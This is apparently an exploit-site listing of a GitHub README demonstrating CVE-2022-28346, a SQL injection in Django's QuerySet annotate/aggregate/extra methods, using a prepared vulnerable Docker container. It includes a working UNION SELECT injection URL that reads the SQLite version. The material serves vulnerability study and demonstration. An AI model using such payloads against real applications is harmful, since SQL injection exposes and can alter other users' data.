Exploit for SQL Injection in Djangoproject Django CVE-2022-28346

Name: Exploit for SQL Injection in Djangoproject Django CVE-2022-28346
Rating: 5 (139 reviews)
2024-01-19 | CVSS 7.5
## https://sploitus.com/exploit?id=5AA8C905-987F-5137-ADE7-09C9C573FC15
# CVE-2022-28346
A flaw was found in the Django package, which leads to a SQL injection. This flaw allows an attacker using a crafted dictionary containing malicious SQL queries to compromise the database completely.
<br>
## Table of Contents
- [CVE-2022-28346](#cve-2022-28346)
    - [Description](#description)
    - [Environment](#environment)
    - [Proof of Concept and Exploitation](#proof-of-concept-and-exploitation)
    - [References](#references)

You will find above in the code repository the detailed analysis report (PDF) on CVE-2022-28346.

## Description

CVE-2022-28346 is a critical vulnerability identified in various versions of Django, a popular Python web framework. This vulnerability specifically impacts Django versions 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4.

The core of the issue lies in the QuerySet.annotate(), aggregate(), and extra() methods within Django. These methods are vulnerable to SQL injection attacks when column aliases are used in conjunction with a crafted dictionary (with dictionary expansion) as the passed **kwargs. SQL injection is a type of attack that allows an attacker to interfere with the queries that an application makes to its database. It can be used to view data that they are not normally able to retrieve, including data belonging to other users, or any other data that the application itself is able to access. In some cases, an attacker might be able to modify or delete this data, affecting data integrity.

## Environment
To conduct a thorough test of this vulnerability, ensure that there is ample free space on your hard disk. A minimum of 1.2 GB is required to successfully perform the vulnerability test.

If you already have `Docker` installed, you can skip this section and proceed directly to the next set of instructions.

To begin testing this vulnerability, install Docker:
- [Install Docker for Linux environment](https://docs.docker.com/engine/install/ubuntu/)
- [Install Docker for Windows environment](https://docs.docker.com/desktop/install/windows-install/)

Verify that the `Docker` is operational before moving to the next steps.

In your terminal execute the following command to get the docker image that we have created and pushed to `DockerHub` :
```bash
sudo docker pull marouanekamal/cve-2022-28346:latest
```

<img src="images/1.png"></br>
And wait for the Docker image to finish pulling. If you encounter any issues, it may be due to your internet connection; please ensure that you have a stable and active connection.

After the installation ends, verify that the image exists by running the following command :
```bash
sudo docker images
```
<img src="images/2.png"></br>

You can now run the docker image using the following command :
```bash
sudo docker run -p 8000:8000 --name my_cve_container marouanekamal/cve-2022-28346:latest
```


<img src="images/3.png"></br>

Now the server is running and we can exploit this CVE ;)


## Proof of Concept and Exploitation
After running the docker image you can enter to the following link to check if the URL is accessible :
```javascript
http://0.0.0.0:8000/
```
<img src="images/4.png"></br>

The word `ok` displayed which means that the URL is accessible and everything is working fine!

Now let us attack this vulnerability using SQL injection. Type the following URL in order to do so :
```javascript
http://0.0.0.0:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
```

<img src="images/last.png"></br>
We could manage to determine the version of SQLite used by the server ;)

### References
- https://mocusez.site/posts/a3ce.html
- https://blog.csdn.net/weixin_46944519/article/details/128496498
- https://www.cvedetails.com/cve/CVE-2022-28346/?q=CVE-2022-28346
- https://avd.aquasec.com/nvd/2022/cve-2022-28346/
- https://cyber.vumetric.com/vulns/CVE-2022-28346/sql-injection-vulnerability-in-multiple-products/
- https://www.suse.com/security/cve/CVE-2022-28346.html
- https://docs.djangoproject.com/en/4.0/releases/security/
- https://www.freebuf.com/vuls/332893.html

<hr>
Should you encounter any issues or require clarification on any of the steps, please don't hesitate to reach out via email for assistance :<br>

[kamdrain@gmail.com](mailto:kamdrain@gmail.com)